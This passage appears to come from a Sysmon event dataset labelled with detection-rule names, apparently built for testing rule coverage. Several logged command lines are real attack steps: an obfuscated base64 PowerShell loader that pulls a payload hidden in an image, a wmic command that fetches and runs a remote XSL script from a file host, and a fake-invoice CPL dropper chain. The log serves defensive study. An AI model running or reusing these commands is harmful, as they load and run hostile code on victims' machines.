([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ParentProcessId":2476,"ProcessGuid":"747F3D96-FBCA-5D53-0000-001036784100","ProcessId":2876,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 12:17:14.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10675,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T12:17:14.893930Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-29 21:09:48.910","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-6056-5D3F-0000-0010C9EF4100","ProcessId":4600,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl","UtcTime":"2019-07-29 21:11:11.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4860,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:11.156704Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\System32\\control.exe\" \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\control.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A7B65500","ParentProcessId":4996,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ProcessId":4356,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.445"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:17.587732Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ParentProcessId":4356,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ProcessId":4884,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4864,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:17.621241Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\wscript.exe\" /e:JScript.Encode /nologo C:\\Users\\IEUser\\AppData\\Local\\Temp\\info.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE","Image":"C:\\Windows\\SysWOW64\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ParentProcessId":4884,"ProcessGuid":"747F3D96-60F7-5D3F-0000-00106F2F5600","ProcessId":6160,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:19.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4865,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:19.098105Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic process list /format:\"https://a.uguu.se/x50IGVBRfr55_test.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-CE84-5CE6-0000-001094130600","ParentProcessId":2940,"ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 16:49:05.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":892,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T16:49:05.736570Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-23 16:49:07.731","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\x50IGVBRfr55_test[1].xsl","UtcTime":"2019-05-23 16:49:07.731"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":894,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-23T16:49:07.731893Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WScript or CScript Dropper","Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\updatevbs.vbs\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.8.7600.16385","Hashes":"SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\updatevbs.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9C8E-5D04-0000-0010D0421600","ParentProcessId":540,"ProcessGuid":"365ABB72-9C9D-5D04-0000-001039CE1600","ProcessId":172,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 07:22:05.660"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7681,"Execution_attributes":{"ProcessID":2044,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-15T07:22:05.691759Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.236","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\~DF0187A90594A6AC9B.TMP","UtcTime":"2021-01-26 13:21:13.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429127,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.237481Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.558","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\b8162606fcd2bea192a83c85aaff3292f908cfde","UtcTime":"2021-01-26 13:21:13.558"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429128,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.558988Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.560"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429129,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.560814Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.561"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429130,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.561514Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.290","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.log","UtcTime":"2021-01-26 13:21:13.683"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429131,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.683762Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\bouss\\source\\repos\\blabla\\","Description":"MSBuild.exe","FileVersion":"16.6.0.22303","Hashes":"SHA1=20456AC066815ED10C6CEF51AF5431ED6001532F,MD5=35DC099BE64FA5AB4C01DDA908745240,SHA256=5083FD9C0AB7ECAEE85B04A22EBD29A88D7BC75CB02186D9C9736269B8AC10A9,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-5082-600D-0000-0020A246F726","LogonId":"0x26f746a2","OriginalFileName":"MSBuild.exe","ParentCommandLine":"\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe\" \"C:\\Users\\bouss\\source\\repos\\blabla\\blabla.sln\"","ParentImage":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ParentProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ParentProcessId":7664,"ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"Product":"Microsoft® Build Tools®","RuleName":"","TerminalSessionId":5,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2021-01-26 13:21:13.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2429132,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.690036Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.641","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\blabla.lastbuildstate","UtcTime":"2021-01-26 13:21:13.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429134,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.972503Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429135,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.975523Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429136,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.975732Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual 